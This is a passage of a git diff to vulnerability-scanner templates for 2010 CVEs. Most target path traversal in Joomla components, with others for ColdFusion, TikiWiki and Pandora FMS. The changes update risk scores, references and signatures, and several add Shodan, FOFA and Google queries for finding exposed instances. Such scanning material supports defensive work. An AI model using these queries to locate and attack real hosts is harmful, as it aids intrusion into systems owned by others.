a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86287 + epss-percentile: 0.87631 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b23a4aac6fedfb37e15cc43e7f51bf59ba413a099ae58090b05ee9be66d60314022100cfad298dd85b0b1b0cb1046b79e4e8822f005cb18b4081f3c898c3397cdbcc31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a8acf3d912e951184f07a48b87c8045691518679ee88020752b9e4dd173a092022100bd260f2ca3cb5ae17b9ccf3bba743bb2963a9fcc9f340e92c95d75d54ae10ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 988470fe0d..bdee8941c7 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92761 + epss-percentile: 0.93494 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e67b1c6317d9843ab60b722ade0f0942e4913d7c3f5630b1c8d19483f638f0c0221009162ad1fcb96f2a504a7f16e9805bc854997ba06eeb3c61adedbf42d4225287e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100858eabd63b6f72843f947e5246274143c6b956b7879d26cbf87d64780ad211df022100c785ac8b95b0a5a99bc41f1ffe795c59c91ba0f621307ff96ab25e35bb5096a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 5b0064eee5..fc61a3a298 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220257730d7812d60cf61ac7279df9ab6ca9bf78181a9c6374ad4d684ad292985da022100d8a43d8b649b8ec95355cb47c4765004ac172a0b0182c730086927f55efcf211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index f94756a8b9..b82676c9f8 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -11,13 +11,14 @@ info: reference: - https://www.exploit-db.com/exploits/12083 - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80059 + epss-percentile: 0.8192 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040f7d241d5e5a884c1963854465cf4831f51f493d326d327351a68621b8ebc3e022100d1c7c3b472c326444bc1b1dd290db71df1dd2cade4f6d02d0d16e10f68ab869b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050590d4500ed1b763b2bff4f98927178f7e55b44f9a1763caf7f9779d70ffa4c02206df063e8f5d1eebe7a5c628871feeff1823eb31d1b2ba1f3a16634e0e1996343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 8ef35d4b8e..eae9eb76ae 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77311 + epss-percentile: 0.79446 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eb093037fb061176dd3b11eb61772ebd05a8d5e6b7b77b7c78f9e104162f8085022100d573cfc124ecec2594c14755043485055a53bf9712c250c00c5bfcacabe64cee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100808d072b688a3b3ea4d04558291a5e08c4675e3eeeb07213dfedd29ef0c1c9f0022067528ebbbb4fa1b6fca937a8be9cd70474980c75469e958e712636b5e69b9818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 819296c630..75f553daed 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73222 + epss-percentile: 0.75733 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009cbc325331da11e25f4fb8d31fd398ac39f41c26c89d567dfd2945557f4275270220384a57dbc3afa51cbb77526db5c0f891e93a2b9153a342bf1de2ccca20f1d5f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b86ef37ec2406ebcd7a572475a092ace4af2e4fda2be5426f1f853176f0c643a02206545a885ccc98c24769c1429820ea52fc4fa78a8ea782584bc48106189b76655:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 57d5f2b9da..a646f8aa04 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2035 cwe-id: CWE-22 - epss-score: 0.07071 - epss-percentile: 0.93832 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb5ec476643b95c64caa86cc061308c75ceace843e58db8bae08413f2160846602201dc89742c9b1a55df817ec772150de1c14e53494415f3a1e177701a94db23fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073386e346d2a0f6d5672382eb52edf74cc67278b7df1e5861b21e480b26173240220794a4a4a638ba7dca2c358a68f74cb8665b51531bff972997c5ac470e0344cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index fa16b9b5dc..0bcb0cfb30 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 - epss-score: 0.00718 - epss-percentile: 0.7851 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a903733a1bc7131d855c5d53d11c378d6476b6e613a596b0e25c59edcfd3f92022100d4bc9343ee7c9595b3e44b08de9ce86a8f2d0af8a44d8483514b8ef8f46c7f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a3b425ae5ec2bbe01c2787c7d7024e0155bdd84568b28dcfa6e1f464a6bbd9902207b990f2ce66a6360bdb52a7cb037367687c2db90c33ab76fcd01adcbc246470a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 52e7647055..4b1000b9e2 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 - epss-score: 0.00718 - epss-percentile: 0.7851 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022040f5ddf1305890a721c4c1b8140d7c149c2cd3ce17446937f2471e5bebc466d4022100e8a39a2b4cb386864faa905b2dfb3c53d36c6d18fd9fc211a1e6c2d3c1d221b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba2f173a61884eb77eca05645e474ea0998974ae81cd2f56a2df04bbad2382af022100a52f1e7d8dd7915e7ae5f9d64e3601969a06347ffbbfe263f7c204d53ffc9512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 2fafc5155a..c533ba23da 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90637 + epss-percentile: 0.91571 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201528ba80abd9bbc78d30e40e479c27465861d3fa2dd697eb180617ea6e0d81f802202cab5a94649a0d4e9e866b78525516c49a7311601aafcac4bede2efda4bea42a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022072cdaa8c8561d8f802f104a5587be461af0eb4068f8539cb2d673d1e790ae79202205b5ae21b73e9b12635e1776cf8473fec583f1718d6a3bda5b9cc30605ba6b242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 91a05a5cee..fa599ca328 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.84048 + epss-percentile: 0.85468 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e59aa470d7b6c5748d0e63fffbaa81a4831047b347273d58d3cb41ca77557c13022100ac7540e4284e4eab9793f192e0dea83d7673f2050021711441c420f87797fa77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049543a3ccb3af025c6c9f56d485b2dae14902733e0301b1bac45483c4fa40fa10220274a33f7be26019e841a1286e2a1f556fa30cd9088e619bd725f572895b2ee64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 3b14b099fc..884d4fcd1e 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-2307 cwe-id: CWE-22 - epss-score: 0.00813 - epss-percentile: 0.81409 + epss-score: 0.00917 + epss-percentile: 0.82851 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbfdf3607b6347ba7d7420f35506f8f2cff5bcb10afcb6d67570bbc874f0ea98022100e12d0a6af4937bca526ed8962cf3d20fcdfde6f0e14e2153b2f73251c35b4125:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220598127be060bb67785f5bbc627e11b7d715ca64009de5eb572e823ff9bf7baa8022100cfe8b0280087e065a478af5f5b7eb691406bea8e63a1ff22dc87086707b84840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index e37ce9a665..c0ebd7fdb7 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d0fbfb8ffd049aeaf94cf869ef1eb3f0f13b0d27229bb4ed42baa7347337b5e702205a316eeb82abfedeb1294c785875852bd9e3bda4b7d2e32bfaa24f9613e36cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 99fde06630..0206234511 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80059 + epss-percentile: 0.8192 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022072b515f91c496b58e595115b0d084c1aef00d4c6ee17205d003acb4ab43c571302203b36bc9c01b393ef1b59fd113ab4455849196192ef1900eee38d59ce6a1a60a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f5ffc7d61e608cca2478cc4115fe3177e5ed61660e8e13424a4c772b685bb9402210087feaeec186288bbbc891fdd5dc0ba7612f5cfd614be5ffac00907ff4670c362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 20656fe948..5279fc55d7 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.81565 + epss-percentile: 0.8192 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a9df18c9b0d35866ea9765eaa67e92c811c401ee47b98f0ed80b8b20d1e61999022100bf0763eb2da8ee0ea76eaa0be32e72d2298820a16dbe45c9d2318c35b5cb37de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ac5f0a4f9ac3488e5fb632bba8473b66643a43886afa0927f3c711634c8b1b802210095a5da3a584d4804f11a0e4536761c7d8dac1f3bc625bd5f98a40d80c04ed818:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index f89f1e0f29..f3708173e8 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -20,13 +20,21 @@ info: cve-id: CVE-2010-2861 cwe-id: CWE-22 epss-score: 0.97078 - epss-percentile: 0.99753 + epss-percentile: 0.9977 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi http: @@ -46,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095d36bc58cabf1166f9a2b788011d6fbc46b38501ea467e227180c4dd1b8b36702203532cec78f34e9a2b01a20cd8f897222e5be1e58dc91a5551005ab1515aa21bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 1546f38fc8..a2ae05ff6f 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.90478 + epss-percentile: 0.90703 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c91419c3b0dbe4afe3e27b165914d136e3f1855987e5f3f1ddeffe3a0eb6669022100d24948753205fe02e60749f58a0130d1567ccb88505cedee18f474e98e61c8bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 23c6b25fd1..8598e72da2 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90637 + epss-percentile: 0.91571 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022036441deef54186effe4bc8c14c01564b3885f6058e30608ad2fe449e677c00a702205c4d8db4d4a05a86268c87cca7d2b6291aa83a4a825791567eefa258512efac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab1ecd9388a72b63dd3c8b790894bb078b4993b8f937584c44f3bf6be66e8c04022100b34366bca7a019753bf817d4238b4917e7694aff29df603e0779819cc1e843b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index eb6d38cbf0..a3c63c503b 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - epss-score: 0.00626 - epss-percentile: 0.76748 + epss-score: 0.02682 + epss-percentile: 0.90436 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086161433d96dea0abbb2460f498faec5e7cc9dc2dac4ae9051982a2ce801d084022016b89bbd96b6df1b01c5144b1077770507e9b836e89044fd5c992e1586fb99df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 85c0b4a3a6..4e77e67d8c 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.87178 + epss-percentile: 0.87445 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3c7c9347f9d8a8e7b83098897aecc1fc6ca5594a43e83505cd43fdd025d6130022100832745cf9064f1897cb80f0caceac6dfa4b448f2bae9f8ca58b1b79ac602e833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef798e04d208e6c7944c2de7bd37f63fcc958b0834ef7b0cf0a355a7b866fb15022100c6442d68055cef043c33708877f3fc2667950bb0befd604648e255086d34cac7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 7f6b76880d..d71ca59e98 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - epss-score: 0.03038 - epss-percentile: 0.90751 + epss-score: 0.02675 + epss-percentile: 0.90421 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2010,tikiwiki,lfi,tiki http: @@ -42,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d07eddfe6076e3294489122182c54098fc31dc93dfaf0cec95d3140d24aef9800220022764390a506aceb2b9b5bdcc58ada9c586462bf262e0c7d332e98fe5807db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 4feec95d93..1e44a108c0 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica http: @@ -42,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028440e6744ab15a712bbddd9e67effbb10196178d3709600c03cdd2e30ade50a02205d3555b2f4623199a271f2977587e15566212b551f0fcf96b961652ce2954fdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index b65b57629d..22b8f6ae6b 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.92278 + epss-percentile: 0.92461 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207f173747822e13f460537c9f352c220b09c207c8d434d6851187c72c919607d9022100b83c290b935b1c2ab7d8803f7fba050894f359981c55eebe2e7b320f92dc2edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200b5db4441b5c5baa26a44fcd145acd1ac6103d02222029f4d15456097bff7025022044b70732e749c2c8c2bd5b13cee361bf42387b312d1e0887f6e56d758594d175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 29d6cfbc01..d3323122a7 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.0016 - epss-percentile: 0.51628 + epss-percentile: 0.52542 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220090ace41aa0b7a63b491ff1b35ea977e018fd5f7ac4e5bebe586d7c925dab5ef0220211b310be5c582ef6ae23ddaeb61459599b65fb35f6b0ea543195a0f7cdf0a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200897c3f3a57223199dcdda7ca0d58cb353c96217d295bf61910f84555e8de3dd022100cc179f9666339e72c243c340ca9124694c9b70e3d22b3e0459b0502fb3493085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 7504999138..d0f0ed004e 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.00316 - epss-percentile: 0.67285 + epss-percentile: 0.70272 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df2b627845f4cfe972f4569690174ffe89b4221f5be16d0a6cb676e29ce2b84202203a4014cdc61ccefa25815adf442d68757eb46d7c0dbe703bf8b7d1739538f26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099c8a2ea34e5a300c70e613756972e76528af7ded59250030516965a6a1680710221009bbef457fcbe95c5b31680b9501a35b508099c724f7bb501a8664e2261a4b11c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 55d16d1977..8ca4956da3 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -20,13 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - epss-score: 0.06122 - epss-percentile: 0.93381 + epss-score: 0.06135 + epss-percentile: 0.93535 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: modx product: modx_revolution + shodan-query: cpe:"cpe:2.3:a:modx:modx_revolution" tags: 